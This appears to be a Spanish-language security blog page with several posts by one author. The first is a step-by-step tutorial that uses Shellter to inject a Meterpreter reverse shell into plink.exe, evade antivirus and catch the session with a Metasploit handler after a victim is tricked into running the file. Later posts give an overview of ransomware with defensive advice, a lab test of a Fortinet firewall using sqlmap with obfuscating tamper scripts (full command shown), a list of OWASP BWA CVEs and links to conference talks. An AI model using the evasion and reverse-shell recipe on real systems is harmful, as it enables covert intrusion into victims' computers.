Evadiendo Antivirus con Shellter y Metasploit

shellter

Las técnicas para evación de antivirus son muy diversas y cada vez evolucionan , sin embargo cada cierto tiempo aparecen nuevas técnicas unas mas buenas que otras.

Shellter, es una herramienta de inyección de shell dinámica, según sus autores, probablemente el primero infecta PE dinámico, se puede utilizar para inyectar shells en programas para  Windows y por ahora  solo para plataformas de 32 bits.

Shellter aprovecha la estructura original del PE en los archivos y no aplica ninguna modificación, añade una sección extra con RWE , además usa un enfoque dinámico único,  lo cual lo hace imperceptible por los antivirus.

Vamos a ver como es su uso:

1.- ESCENARIO

Kali Linux en la IP 192.168.1.36
Windows 7 con AVG Antivirus en la IP 192.168.1.35

hackingwindows

2.- SETUP
Es necesario descargar shellter desde la pagina https://www.shellterproject.com/download/  en esta caso usaremos la versión 4.0

wget http://www.silcom.com.pe/soft/shellter.zip   ( Sitio alternativo)
unzip shellter.zip
mv shellter /usr/share/

3.- INICIAR SHELLTER
– Vamos a usar el archivo “plink.exe” el cual se ubica en Kali Linux y moverlo a la carpeta donde tenemos shellter .

cp /usr/share/windows-binaries/plink.exe /usr/share/shellter/

shellter
– Luego iniciaremos shellter de la siguiente forma:

wineconsole shellter.exe

shellter

4.- CONFIGURACIÓN DE SHELLTER

– Escojer modo automatico con la opción “A”

shellter

– Luego indicaremos el programa al cual le inyectaremos el shell code el cual es el archivo plink.exe previamente copiado.

PE Targer : plink.exe

shellter

– Luego cuando aparezca la lista de payloads elegir la opción “L”
Use a listed payload or custom: L

shellter
– Luego elegir la opcion “1”
Select payload by index: 1

shellter

– Ahora configuraremos los datos de retorno del shell reverso

set LHOST : 192.168.1.36 ( IP de Kali Linux)
set LPORT : 5555 ( Puertos donde retornará la shell

shellter

– Finalmente si todo salio bien, tendremos un mensaje “Inyection Verified” y luego presionamos “Enter” y finalizaremos shellter.

shellter
Con esto hemos conseguido que el archivo plink.exe esté infectado con el shell reverso.

5.- ACTIVANDO EL HANDLER CON METASPLOIT

– Iniciamos con msfconsole

shellter

– Ahora pondremos a la escucha el handler en el puerto 5555

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.36
set lport 5555
exploit

shellter

6.- AHORA VAMOS AL WINDOWS Y PROBAMOS

– Mediante alguna técnica de ingeniería social ( y de esas hay muchas) conseguimos que el archivo “plink.exe”  sea ejecutado en la víctima.

shellter

– Como podemos ver tenemos una bonita sesión de meterpreter :D sin que el antivirus reaccione.

shellter
– Ahora podemos hacer un par de cosas

shellter

shellter

Bueno ya estamos adentro, la herramienta se ve prometedora, esperamos que salga la mejora para 64bits.

Espero les sirva
Juan Oliva
@jroliva

SECUESTRANDO TU PRIVACIDAD parte1 – remastering soon

 

Hace ya unos meses a través de un experto en informática @Miguel_Risco_C, me llegó un informe sobre un virus que afecto a su cliente en Lima, se trataba de una nueva variante de virus crypto-ransomwaring denominado cryptowall versión 3.0.

Antes de detallar de qué se trata un cryptolocker y ransomwaring y demás hierbas, entendamos que daños ocasiona.

  • Vector de infección:

El vector de infección al parecer había sido sujeto a los famosos adware y spyware a través de anuncios publicitarios vía web, dando hilo al problema se encontró esta nota:

http://www.theregister.co.uk/2014/08/11/cryptowall_malvertising_yahoo_ad_network/

Donde menciona que los malhechores usan Yahoo!’s advertising network, para esparcir el ransomware, aprovechándose de algunos fallos en las actualizaciones de IE.

Luego horas más tarde me llego otro reporte de infección en Lima, otra posible variante del virus denominado CBT-crypto, que era esparcida en forma clásica a través de archivos adjuntos vía correo electrónico.

COMENZANDO A ATERRIZAR ALGUNAS IDEAS:

¿Qué es el ransomwaring?

Este término de Ransomwaring que llego por primera vez el 2012 a través de una conferencia de Macfee como el ataque del futuro, ocasiona el secuestro total de tu dispositivo o data importante de tu dispositivo, suena estremecedor, pero es así sin más ni menos como se entiende.

  • ¿Si me infecte que aparece?
    Para dar algunos ejemplos miremos el siguiente screenshot una vez ya infectado:
  • IMAGEN1Este pop add propio del CBT – crypto es el similar que del Cryptowall 3.0 y a todos los ransomware-virus, donde si leemos un poco menciona 3 cosas importantes:
    • Tus datos personales han sido encriptados.
    • Para obtener la clave desencriptadora de tus datos tienes que pagar a través de bitcoins (común) u otros medios de pago.
    • Tienes un tiempo limitado para realizar el pago, sino el precio para la clave desencriptadora de tu data será el doble y así progresivamente.

     

    • Aparición de archivos encriptados:

    Acá vemos la aparición de archivos encriptados:

    CBT-CRYPTO:

IMAGEN2

CRYPTOWALL 3.0:

IMAGEN3

  • Archivos cifrados:

Acá podemos observar un documento en Excel totalmente cifrado:

IMAGEN4

  • ¿Cómo entenderlo mejor?

Sin muchas palabras técnicas, es como que a tu folder de tus datos le hayan puesto una caja con llave, el cual solo el dueño de la caja tiene la llave para poder abrirla.

En ese sentido, la única forma de recuperar tu data es pagando.

HISTOGRAFIA Y DETALLES TÉCNICOS:

Acá ya entro a detallar toda la parte técnica, si tienes interés de cómo solucionarlo al final del artículo.

  • Comparativa

Una gran diferencia que se tiene los virus pasados son las siguientes:

  • No roba información de la víctima, en lugar hace que sea imposible acceder a tu información.
  • Una vez infectado no hay antivirus que pueda remover el cifrado, da lo mismo.
  • Usa criptografía conocida y fácil de implementar, el problema es el tipo de criptografía que hace única al propietario.

 

  • Modos comunes de infección:

Acá tenemos cosas clásicas:

  • Spam / Social engineering
  • Direct drive-by-download
  • Drive-by-download a través de malvertising
  • Malware installation tools y botnets

Algunos ransomware-virus desde el 2013 -2015:

  • Dirty Decrypt
  • CryptoLocker
  • CryptoWall / Cryptodefense
  • Critroni / CTB Locker
  • TorrentLocker
  • Cryptographic Locker

 

Algunos elementos comunes de estos virus son por ejemplo:

  • Droppers
  • C&C, servidor comand center
  • encryptacion
  • targeted files types.

 

  • Timeline:

IMAGEN5

La primera aparición remonta al 2013 para SO Windows, habría que recalcar que la primera aparición de estos “secuestradores virtuales” es a través de SO Android.

  • Análisis:

Habría que recalcar que al ser nuevos virus las formas de análisis tradicionales, no tienen demasiada contundencia para elaborar una contramedida, como el uso de ingeniería inversa.

Las características de todos estos ransomware – virus son:

  • Usan criptográfica asimétrica (private key y public key), el cual es compartido y firmado a través de un C&C (comand center)
  • Usan un Wincrypto que es un crypto API para cifrar la data.

Un esquema de practico de cómo es que después de la infección entra a tallar la criptográfica asimétrica y el roll del C&C (comand center)

IMAGEN6

  • El agente del virus recolecta datos y los cifra con AES usando la Kaes.
  • Ya que se trata de una criptográfica asimétrica usa RSA y la llave publica del C&C para cifrar la llave Kaes
  • La data y la llave de AES viaja completamente encriptados hacia el C&C
  • Ya en el C&C tanto la data como la llave Kaes es desencriptadá usando la llave privada del C&C, esta llave es única y lo tiene el atacante.
  • El C&C genera otro par de claves para seguir encriptando la data.

Como observamos usa protocolos criptográficos ya conocidos pero muy potentes para cifrar y capturar tu data.

Acá algunos screenshoot de la comunicación cifrada con el C&C.

 

IMAGEN7

IMAGEN8

Algo más importante que anotar es el alto grado de ofuscación por capas y covert launch como la creación de procesos en suspensión que tienen estos virus haciendo complicada la labor de detección de los antivirus.

Esta grafica servirá para entender un poco más el proceso:

IMAGEN9

Si vemos en el peor de los casos puede borrar las “shadows copies” que son copias de restauración por defecto de los archivos en Windows vista para adelante (siempre y cuando esté configurado)

  • Dominios y protocolos de comunicación C&C

En el cuadro podemos observar los protocolos comunes de comunicación con el C&C y sus dominios:

IMAGEN10

Como cosa resaltante es el uso de proxie TOR y HTTPS.

  • Tecnología criptográfica

Acá podemos observar las tecnologías criptográficas y desarrollo de APIs de estos virus:

IMAGEN11

  • Costos por rescate

Los costos varían entre $100 a más de $1000 por rescate:

IMAGEN12

  • ¿Y a donde apuntan estos cifrados?

Todo tipo de documentos, imágenes, videos, audio, base de datos, password y certificados managers, software financiero, backup (.bak);

IMAGEN13

  • Si pago que obtengo:

Al realizar el pago tendrás un .txt donde te darán la clave para poder desencriptar tu data:

IMAGEN14

UNA VEZ INFECTADO ¿QUÉ HAGO?

Antes de llegar a este punto recomendaría tomar siempre en cuentas las medidas comunes para no infectarse:

  • Uso de antivirus recomendados
  • No abrir archivos adjuntos en correos electrónicos dudosos.
  • No insertar USB sin previa limpieza.
  • Cuidado a donde exploras.
  • Actualizar tu navegador y sistema operativo

SI YA ME INFECTE:

  • Consultar a un experto.
  • No usar software para recuperación de archivos comunes, ya que estos pueden empeorar la situación.
  • El tiempo de rescate es vital.

Justo en esta última recomendación me detengo y explico:

  • Tu data ya cifrada es irrecuperable, (acá hay criptologos trabajando puede demorar desde días hasta años en descubrir la clave y por las características técnicas es casi imposible).
  • Puedes usar herramientas como shadown explorer para encontrar puntos de restauración y grabado por defecto de tus archivos y como entenderás dependerá mucho del punto de tiempo en el cual se grabaron tus archivos, así que el porcentaje de recuperación es cuestión de suerte.

Como usar “el shadown explorer”, te dejo es video:

https://www.youtube.com/watch?v=ifKNf4qbAM0

¿QUE MÁS PUEDO Y DEBO HACER?

Acá un excelente artículo escrito en softonic (irónicamente uno de los máximos esparcidoras de spyware):

http://articulos.softonic.com/como-defender-tus-archivos-contra-cryptolocker-y-cryptowall

@dUn_h4t

 

Hacking Fortinet – SQLI test (English Version)

fortinet-8To follow me on Facebook and Twitter  know that I recently had a special curiosity in Fortinet, because is one of the security devices that have the greatest positioning in the region.

Another aspect is that in my projects pentest, when I said that the device was present protecting the servers, I never had trouble with block performing attacks.

Last week with my friend Alexis Torres  colleague area pentest and specialist on Fortinet solutions, making some offensive security testing to validate the security rules when the device protects a web application attacks

For testing use a properly configured Appliance FortiGate D60 ,

whether the team actually blocking attacks when protecting a Web application, the configuration perform to Alexis  (fortiner specialist solutions) the idea was to make rigorous testing.

FortinetThe test consisted, one vulnerable web application as DVWA which was protected by a D60 Appliance Fortinet.

fortinetDeveloping Attacks:

As you know SQL vulnerabilities Inyection (SQLI) are the most common in web applications, this will be validated as they are in first place in the Owasp top 10.

Then with the vulnerable application (DVWA) first we perform very simple attacks SQLI

‘ union select 1 —

Surprise, the Fortinet detected pattern SQL, and blocked.

FortinetThe rule that detected the attack was “http.uri.sql.injectionobviously does not say much about its inner workings and to be a well kept secret by the brand.

fortinet

We do not give up and and develop more elaborate attacks with SQLMAP tool par excellence will develop SQLI.

However it was obvious, if the attack sqlmap sent without customization,   It would be easy prey for Fortinet.

Add some modifications to the attack:

speed:

–threads = 1, we adjusted the maximum number of applications 1
–delay = 60, delay in shipment of 60 seconds each sqli

obfuscation

–technique U, we specify the technique based on UNION QUERY
–batch obviate the entry of Y / N
–tamper, we specify the script type used as payload to obfuscate the strings sqli

sqlmap have a wide variety as in pharmacy:

space2hash.py
space2morehash.py
space2mssqlblank.py
space2mysqlblank.pycharencode.py
chardoubleencode.py
charunicodeencode.py

the syntax of the attack sent is :

python sqlmap.py –url=”http://192.168.19.253/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”security=low; PHPSESSID=d0fa0f05f0b714c18b3ba3ebace3f450″ -v 3 –dbms “MySQL” –technique U -p id –batch –threads=1 –delay=60 –tamper “space2mysqldash.py”

After a long time, because as we indicated, we lower the speed of the attack, surprise surprise the device detected the attack and blocking for each existing payloads with sqlmap.

fortinet-sqlmap
fortinet-sqlmap

Well, obviously it was a good result for Alexis but not for me in my position attacker, but from the perspective of protection, it is good to know that the device does the job, although it is necessary to consider these factors:

1. Proper configuration
As I indicated developed tests with a specialist brand, but not only enabling or disabling rules or configurations, as most companies / implementers.

It is also important that a specialist in attacks make the other part of the escenario (Ofensive test), so it is possible to have both sides of the stage, safety tests developed offensive and defensive and thus ensure that the configuration is appropriate.


2.
Regarding tests
From the perspective of pentester is not possible to assume a position that the device has the perfect security, about SQLI, considering that a Web application well known on issues of insecurity , but in this scenario was effective, should be more testing and other web scenarios to feel more satisfied.

In the future I hope to develop other security offensive tests as XSS , Session Hijacking, among others.

greetings
Juan Oliva
@jroliva

 

 

 

Hacking Fortinet – SQLI test

fortinetPara los que me siguen en Facebook y en Twitter,  saben que últimamente he tenido una especial curiosidad en los equipos Fortinet,  ya que por un lado, es uno de los equipos que tienen mayor posicionamiento de instalaciones en la región y por otro lado en mis proyectos de pentest a pesar de estar presentes, nunca tuve inconveniente de bloqueos en los ataques que realizaba.

Debido a ello, la semana pasada junto a mi amigo Alexis Torres un colega del área de pentest y que también es especialista en soluciones Fortinet , realizamos algunas pruebas de seguridad ofensiva para validar si realmente el equipo bloqueaba ataques cuando protege una aplicaciones Web, en este caso usando un Appliance FortiGate 60D el cual fue configurado adecuadamente por el , ya que la idea era hacer las pruebas como dios manda.

Fortinet
El test consistió en poner una aplicación web vulnerable como DVWA la cual estaba protegida por un Appliance Fortinet D60 específicamente.

fortinet

Entrando a los Ataques:

Como saben las vulnerabilidades de SQL Inyection ( SQLI) son las mas comunes en las aplicaciones web, esto lo pueden validar ya que están en el primer lugar del Owasp top 10.

Entonces nos valimos de la aplicación vulnerable para primero realizar ataques de SQLI muy sencillos.

‘ union select 1 —

Para mi sorpresa el Fortinet detectaba el patrón de SQL , y lo bloqueaba.

Fortinet

La regla que detectaba el ataque fue “http.uri.sql.injection” evidentemente no dice mucho sobre su funcionamiento interno ya que debe ser un secreto bien guardado por la marca.

fortinet

Es así, que no nos dimos por vencidos y decidimos ir un poco más allá y desarrollar ataques un poco más elaborados con SQLMAP , herramienta por excelencia hará desarrollar SQLI.

Sin embargo era obvio que si enviaba el ataque con sqlmap sin ajustar sería presa fácil del Fortinet.

Así que le agregamos un par de modificaciones:

Velocidad:

–threads=1 , Ajustamos el máximo numero de solicitudes a 1
–delay=60 , Retrasar en 60 segundo cada envío de sqli

Ofuscación

–technique U, especificamos la tecnica basado en UNION QUERY
–batch ,  obviar el ingreso de Y/N
–tamper, especificamos el tipo script que usará como payload para ofuscar las cadenas sqli

en el caso de sqlmap tenemos una amplia variedad como en botica:

space2hash.py
space2morehash.py
space2mssqlblank.py
space2mysqlblank.pycharencode.py
chardoubleencode.py
charunicodeencode.py

De tal forma que el ataque quedó de está forma :

python sqlmap.py –url=”http://192.168.19.253/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”security=low; PHPSESSID=d0fa0f05f0b714c18b3ba3ebace3f450″ -v 3 –dbms “MySQL” –technique U -p id –batch –threads=1 –delay=60 –tamper “space2mysqldash.py”

Después de algún tiempo de espera ya que como indicamos bajamos la velocidad del ataque, oh sorpresa el equipo detecto y bloqueo el ataque para cada uno de los payloads existentes con sqlmap.

fortinet-sqlmap

fortinet-sqlmap

Bueno, es evidente que fue un buen resultado para Alexis pero no para mi en mi posición de atacante, sin embargo bajo la perspectiva de protección, es bueno saber que el equipo cumple con su trabajo, aunque es necesario tener en cuenta estos dos factores:

1.-  Configuración adecuada
Como indique desarrollé las pruebas con un especialista en la marca, pero no solo activando o desactivando reglas o configuraciones, como la mayoría de empresas/implementadores lo hacen,  es importante también que un especialista en ataques haga la otra de parte, de tal forma que es posible tener los dos lados del escenario desarrollando test de seguridad ofensiva así como defensiva y de está forma garantizar que la configuración es la adecuada.

2.- Respecto a las pruebas
Desde la perspectiva del pentester no es posible asumir una posición que el equipo tiene la seguridad perfecta, por lo menos hablando de SQLI, teniendo en cuenta que se usó una aplicación web muy conocida en temas de inseguridad, sin embargo es correcto precisar que bajo este escenario fue efectivo, habría que realizar mas pruebas y en otros escenarios web para sentirse mas conforme.

En el futuro espero desarrollar otro tipo de pruebas de seguridad ofensiva como XSS, Session Hijacking, entre otros y ver como nos va.

Como siempre espero les sirva la información.

Saludos
Juan Oliva
@jroliva

 

 

 

 

 

OWASP Broken Web Applications Project

owbaComo parte de la enseñanza de los cursos de Ethical Hacking que tengo la oportunidad de impartir, suelo hacer uso de aplicaciones o sistemas vulnerables, con el objetivo de poder recrear escenarios y que los participantes puedan no solo identificar fallos de seguridad, si no también poner en practica, diversas técnicas de explotación de vulnerabilidades y desarrollar un adecuado análisis de la razón por la cual se producen estos bugs.

OWASP Broken Web Applications Project  (OWASPBWA) sirve perfecto para este objetivo, ya que es un conjunto de aplicaciones web vulnerables que se distribuye en una máquina virtual que puede ser importada en VirtualBox por ejemplo.

OBWA es una maquina virtual que contiene instaladas aplicaciones web como WordPress, Jommla, phpBB2 entre otros proyectos como Webgoat, DVWA, Multidae, etc.

OWASPBWA

Lo más interesante desde el punto de vista académico, claro está :D es la gran cantidad de vulnerabilidades que podemos encontrar, basta con realizar un análisis con Nessus para darse cuenta de ello.

owaspbwa

owaspbwa

Dentro de las vulnerabilidades que se pueden explotar podemos citar algunas como :

WORDPRESS

CVE-2014-10021
WORDPRESS WP Symposium 14.11 shell upload
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10021

CVE-2007-2426
high myGallery mygallerybrowser.php ‘myPath’
http://www.cvedetails.com/cve/CVE-2007-2426/

JOOMLA
CVE-2014-0793
Multiple cross-site scripting (XSS)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0793

phpBB2
CVE-2003-1215, CVE-2003-1216
SQL injection vulnerability
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1215

Entre muchas otras vulnerabilidades que se pueden encontrar.

Mas información :

Página del proyecto
https://code.google.com/p/owaspbwa/

Archivo OVA para importar en VirtualBox
http://sourceforge.net/projects/owaspbwa/files/1.1.1/

User Guide
https://code.google.com/p/owaspbwa/wiki/UserGuide

Vídeo de la conferencia de presentación
https://www.youtube.com/watch?v=cwjcfAgKqcg

Espero les sirva
Saludos
Juan Oliva
@jroliva

 

 

 

 

 

 

 

SITDEF PERU 2015 – CHARLAS/TALLERES SOBRE CYBERSEGURIDAD

Hace  varios meses que no publico temas de hacking , por un lado por que ando poco creativo para los post de esos temas , así que si tienen sugerencias.. soy todo oídos y por otro lado, por que ando involucrado en algunos proyectos que tienen toda mi atención, esperemos que exista un momento que pueda publicar algo referente a este tópico.

En fin .. sin embargo no dejo de pasar la oportunidad de compartirles algunos eventos en donde tengo el gusto que me inviten a exponer algunos temas, en done he podido profundizar en el área del pentesting.

Es así, que el pasado 14 de mayo fui invitado al evento SITDEF PERU 2015 , gracias al gran Walter Cuestas , el evento tenía una temática muy particular  “TECNOLOGÍA PARA LA DEFENSA Y PREVENCIÓN DE DESASTRES NATURALES”

sitdef

En donde se tuvo un espacio Cyberseguridad, donde tuve el gusto de participar con el team de Opensec brindado charlas/talleres :

juan oliva
Luego del evento Walter tuvo la gentileza de colgar todas las charlas que a continuación les comparto:

Web Appicating exploiting and reverse shell por @jroliva
https://speakerdeck.com/opensec/webapp-exploiting-and-reversing-shell

Shell Shock, Quién dijo que Linux era seguro por @jroliva
https://speakerdeck.com/opensec/shellshock-quien-dijo-que-linux-es-seguro

Los 10 Vectores Web que siempre debemos atacar por @MauricioUrizar
https://speakerdeck.com/opensec/los-10-vectores-web-que-siempre-debemos-atacar

Sacando credenciales hasta el bolsillo por @MauricioUrizar
https://speakerdeck.com/opensec/sacando-credenciales-hasta-del-bolsillo

Hacking mas allá de los servidores y redes por Cesar Cuadra
https://speakerdeck.com/opensec/hacking-mas-alla-de-los-servidores-y-redes

Explotando aplicaciones propietarias que usa tu enemigo por Cesar Cuadra
https://speakerdeck.com/opensec/explotando-aplicaciones-propietarias-que-usa-tu-enemigo

Cooking and eating Webshells por @garciacajo
https://speakerdeck.com/opensec/cooking-and-eating-webshells

https://speakerdeck.com/opensec/network-forensics-101 por @oscar_mrdc
https://speakerdeck.com/opensec/network-forensics-101

Let the right one in por @oscar_mrdc
https://speakerdeck.com/opensec/let-the-right-one-in

Fueron un par de días , divertidos, llenos de hacking y gratos momentos departiendo los temas que nos apasionan, espero que se vuelva a repetir.

Saludos
Juan Oliva
@jroliva

 

 

 

 

 

 

 

 

 

Nuevo Libro “Implementando Elastix SIP FIREWALL”

Elastix-SIP-FIREWALL
Tengo el gusto de compartirles que fue publicado el libro que elaboré denominado “Implementando Elastix SIP FIREWAL”

El libro, es un manual que hace una revisión del SIP Firewall de  Elastix e incluye algunos tips y configuraciones para sacar el mejor provecho del equipo.

Por otro lado, no solo cubre aspectos que involucran la correcta y adecuada configuración de Elastix SIP FIREWALL, sino también, las pruebas que todo profesional del área de la VoIP, tendría que realizar, para poder validar y comprobar la protección y aseguramiento de su plataforma VoIP es la adecuada.

El agradecimiento a Elastix , por permitirme desarrollar el material y sobre todo por liberar el contenido, fiel a la filosofía que persigue desde sus inicios.

 Lo pueden descargar desde el blog de Elastix o directamente desde aquí
Saludos
Juan Oliva
@jroliva

(Linux , Asterisk, Hacking y Opensource)

Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

Únete a otros 124 seguidores